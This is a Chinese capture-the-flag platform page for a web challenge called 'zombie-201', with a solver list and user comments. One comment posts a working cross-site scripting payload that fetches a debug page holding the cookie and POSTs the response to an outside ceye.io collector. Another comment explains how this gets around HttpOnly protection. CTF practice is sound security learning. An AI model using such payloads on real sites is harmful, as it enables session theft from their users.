zombie-201WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 36
提  示:
描  述:
wctf{}
评论
vincentshine 28天前

http://82.157.146.43:10973/zombie?show=<script>fetch('http://82.157.146.43:10973/debug').then(data => { fetch('http://xxxx.ceye.io',{method: 'POST', body: data}) })</script>

回复 0

justsosoloveyou 1年前

httponly禁止了js读取cookie,要考虑绕过。由于debug页面的响应包含cookie,那就让后台管理访问debug页面,然后将页面响应回传。要注意js编码和要对页面响应内容编码。

回复 7

WriteUp

暂无相关WriteUp

评分(0)

暂无评分

解题动态

rouzongbaba 攻破了该题 21天前
vnuesa 攻破了该题 27天前
vincentshine 攻破了该题 28天前
krioee 攻破了该题 1月前
UrgerZ 攻破了该题 1月前
garlicfish 攻破了该题 2月前
Yuelan 攻破了该题 3月前
dimo 攻破了该题 3月前
liuwc 攻破了该题 3月前
skyhigh 攻破了该题 4月前
wangjianguo 攻破了该题 4月前
一只小羊 攻破了该题 5月前
WindJ0Y 攻破了该题 5月前
Tao23 攻破了该题 5月前
to5ny 攻破了该题 5月前
wobushicxk 攻破了该题 6月前
1512624649 攻破了该题 6月前
菜狗打比赛 攻破了该题 6月前
wangwangP2024 攻破了该题 7月前
LiHao1 攻破了该题 7月前
问题反馈